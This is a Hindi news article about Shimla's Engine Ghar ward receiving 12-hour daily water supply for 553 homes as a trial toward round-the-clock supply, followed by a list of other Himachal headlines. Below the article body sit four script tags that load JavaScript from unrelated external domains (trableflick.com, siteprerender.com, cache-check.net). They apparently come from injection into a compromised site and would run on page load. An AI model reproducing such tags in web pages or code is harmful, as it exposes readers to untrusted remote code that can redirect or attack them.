Categories: हिमाचल

शिमला में अब पानी की इंजघर वार्ड में 12 घण्टे की सप्लाई शुरू, जल्द मिलेगा 24 घंटे पानी

<p>राजधानी शिमला में अब लोगों को पानी के लिए तरसना नहीं पड़ेगा।शहर में जल्द ही लोगों को पूरा दिन पानी मिलेगा।&nbsp; इंजन घर वार्ड में 12 घंटे पानी की सप्लाई शुरू हो गई है। इससे पहले लोगों को दो घंटे ही पानी मिल रहा था और गर्मियों में लोगों को पानी की किल्लत से जूझना पड़ता था।&nbsp; लेकिन अब शहर में इस बार पानी की कमी नही होगी। जल प्रबधन निगम ने&nbsp; इंजघर वार्ड में 553 घरों में 12 घंटे पानी की अप्लाई शुरू कर दी&nbsp; है। यही नहीं जल्द अन्य वार्डों में भी पानी की किल्लत न हो इसके लिए जल प्रबधन निगम जल्द कवायद शुरू करने जा रहा है। 12 घंटे पानी की सप्लाई मिलने से इंजघर वार्ड के लोग भी काफी खुश है। लोगों का कहना है कि हर साल पानी की कमी से जूझना पड़ता था। दिन में दो घंटे पानी आता था और गर्मियों में तो दो दिन बाद पानी की सप्लाई आ रही थी लेकिन अब हर रोज 12 घंटे पानी की सप्लाई आ रही है।</p>

<p>वहीं, स्थानीय पूर्व पार्षद नरेंद्र ठाकुर ने कहा कि शहर में हर साल पानी की कमी रहती थी लोगों को जरूरत के हिसाब से भी पानी नहीं मिल रहा था लेकिन 24 घण्टे पानी की योजना के तहत इंजघर वार्ड में ट्रायल के तौर पर 12 घंटे पानी दिया जा रहा है। इससे लोगों को काफी राहत मिली है। जल निगम के एजीएम विजय गुप्ता ने कहा कि 24 घंटे योजना के तहत इंजनघर वार्ड में 12 घंटे पानी की सप्लाई दी जा रही है इसके तहत 553 घरों में पूरा दिन पानी दिया जा रहा है और जल्द ही अन्य वार्डों में भी पानी 12 घंटे दिया जाएगा और पूरे शहर में 24 घण्टे पानी की सप्लाई पर भी कार्य किया जा रहा है। बता दें शिमला में हर साल पानी की कमी से लोगों को दो चार होना पड़ता है खास कर गर्मियों में पानी की कमी होती है। दो साल पहले पानी का संकट छाया रहा और कई हिस्सों में दस दिन बाद पानी लोगों को नसीब हो रहा था।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1592188657044″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: पठियार में सार्वजनिक पुस्तकालय और खेल मैदान जल्‍द : आरएस बाली

मुख्‍य बिंदु  आर.एस. बाली ने नगरोटा के पठियार में दशहरा उत्सव के मुख्य अतिथि के…

2 mins ago

4% डीए और 75 वर्ष से अधिक पेंशनर्स को एरियर देने पर महासंघ ने मुख्यमंत्री का जताया आभार

Himachal pensioners arrears announcement: हिमाचल प्रदेश अराजपत्रित कर्मचारी महासंघ के अध्यक्ष प्रदीप ठाकुर और महासचिव…

18 mins ago

Himachal: आर.एस बाली ने परिवार सहित श्री चामुंडा मंदिर में माथा टेका और पूर्णाहुति डाली

R.S Bali Chamunda Temple visit:  हिमाचल प्रदेश पर्यटन विकास निगम के अध्यक्ष और पर्यटन विकास…

30 mins ago

आर.एस बाली ने स्वर्गीय राकेश चौधरी के परिवार को बढ़ाया ढांढस

R.S Bali expresses condolences; हिमाचल प्रदेश पर्यटन विकास निगम के अध्यक्ष  कैबिनेट रैंक आरएसा बाली ने…

40 mins ago

रावण का दहन, मुख्यमंत्री सुक्खू ने दिया सौहार्द और विकास का संदेश

  Dussehra: हिमाचल में दशहरा हर्षोल्‍लास के साथ मनाया गया। शिमला सहित सोलन, मंडी, कांगड़ा,…

55 mins ago

खाटू श्याम धाम के लिए एचआरटीसी बस सेवा नवंबर से फिर शुरू

HRTC bus to Khatu Shyam: प्रसिद्ध खाटू श्याम धाम को जाने वाली प्रदेश की एकमात्र…

1 hour ago